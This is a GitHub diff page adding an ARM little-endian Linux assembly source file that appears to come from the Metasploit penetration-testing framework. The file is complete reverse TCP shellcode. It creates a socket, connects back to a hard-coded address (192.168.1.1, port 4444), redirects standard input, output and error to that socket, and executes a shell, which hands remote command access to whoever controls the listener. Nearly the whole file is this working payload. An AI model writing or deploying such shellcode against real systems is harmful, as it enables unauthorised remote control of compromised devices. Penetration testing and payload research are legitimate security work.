File tree Expand file tree Collapse file tree 1 file changed +93
-0
lines changed
external/source/shellcode/linux/armle Expand file tree Collapse file tree 1 file changed +93
-0
lines changed Original file line number Diff line number Diff line change 1+ @@
2+ @
3+ @ Name: single_sock_reverse
4+ @ Qualities: -
5+ @ Authors: civ , Mark Schloesser
6+ @ License: MSF_LICENSE
7+ @ Description:
8+ @
9+ @ Implementation of a Linux reverse TCP shellcode for ARM LE architecture.
10+ @
11+ @ This source is built from the payload module (instead of other way around...)
12+ @
13+ @ Assemble with: as single_sock_reverse.s - o single_sock_reverse.o
14+ @ Link with: ld single_sock_reverse.o - o single_sock_reverse
15+ @
16+ @ Meta - Information:
17+ @
18+ @ meta - shortname=Linux Reverse TCP
19+ @ meta - description=Connect back to the framework and run a second stage
20+ @ meta - authors=civ , Mark Schloesser
21+ @ meta - os=linux
22+ @ meta - arch=armle
23+ @ meta - category=singles
24+ @ meta - connection - type=reverse
25+ @ meta - name=reverse_tcp
26+ @@
27+
28+ .text
29+ .globl _start
30+ _start:
31+ @ int socket( int domain , int type , int protocol) ;
32+ @ socket( 2 , 1 , 6 )
33+ mov r0 , # 2
34+ mov r1 , # 1
35+ add r2 , r1 , # 5
36+ mov r7 , # 140
37+ add r7 , r7 , # 141
38+ svc 0
39+
40+ @ connect(soc , socaddr , 0x10 )
41+ mov r6 , r0
42+ add r1 , pc , # 96
43+ mov r2 , # 16
44+ mov r7 , # 141
45+ add r7 , r7 , # 142
46+ svc 0
47+
48+ @ dup2(soc , 0 ) @stdin
49+ mov r0 , r6
50+ mov r1 , # 0
51+ mov r7 , # 63
52+ svc 0
53+
54+ @ dup2(soc , 1 ) @stdout
55+ mov r0 , r6
56+ mov r1 , # 1
57+ mov r7 , # 63
58+ svc 0
59+
60+ @ dup2(soc , 2 ) @stderr
61+ mov r0 , r6
62+ mov r1 , # 2
63+ mov r7 , # 63
64+ svc 0
65+
66+ @ execve(SHELL , [ SHELLARG ], [ NULL ] )
67+ add r0 , pc , # 36
68+ eor r4 , r4 , r4
69+ push {r4}
70+ mov r2 , sp
71+ add r4 , pc , # 36
72+ push {r4}
73+ mov r1 , sp
74+ mov r7 , # 11
75+ svc 0
76+
77+ @ addr
78+ @ port: 4444 , sin_fam = 2
79+ . word 0x5c110002
80+ @ ip : 192 . 168 . 1 . 1
81+ . word 0x0101a8c0
82+ @. word 0x0100007f
83+
84+ @ SHELL
85+ . word 0x00000000 @ the shell goes here!
86+ . word 0x00000000
87+ . word 0x00000000
88+ . word 0x00000000
89+ @ SHELLARG
90+ . word 0x00000000 @ the args!
91+ . word 0x00000000
92+ . word 0x00000000
93+ . word 0x00000000
You can’t perform that action at this time.
0 commit comments